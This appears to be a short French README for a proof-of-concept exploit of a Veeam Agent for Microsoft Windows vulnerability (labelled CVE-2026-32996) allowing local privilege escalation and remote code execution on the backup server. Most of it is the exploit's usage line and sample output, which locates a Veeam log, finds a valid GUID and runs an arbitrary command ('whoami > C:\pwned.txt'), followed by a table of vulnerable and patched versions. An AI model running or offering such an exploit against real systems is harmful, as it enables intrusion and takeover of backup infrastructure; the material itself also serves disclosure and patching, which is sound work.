
Une vulnérabilité dans Veeam Agent for Microsoft Windows permet une élévation de privilèges locale.
Exécution de code à distance (RCE) sur le serveur de sauvegarde Veeam par un utilisateur de domaine authentifié.
Consultez l'article de blog pour les détails techniques.
https://github.com/user-attachments/assets/8a570332-1cf6-4905-9107-8fcb973c9ce7
CVE-2026-32996.exe "whoami > C:\pwned.txt"
[+] Found Svc.VeeamEndpointBackup.log
[*] Searching for valid GUIDs...
[+] Valid GUID found: 9048554a-ec99-4e18-8bc4-edc637e8d8d4
[*] Executing command 'cmd /c whoami > C:\pwned.txt'
[+] Successful!
| Version | Statut |
|---|---|
| 13.0.3.1220 | Entièrement corrigée. |
| 13.0.2.1102 et antérieures | Vulnérable. |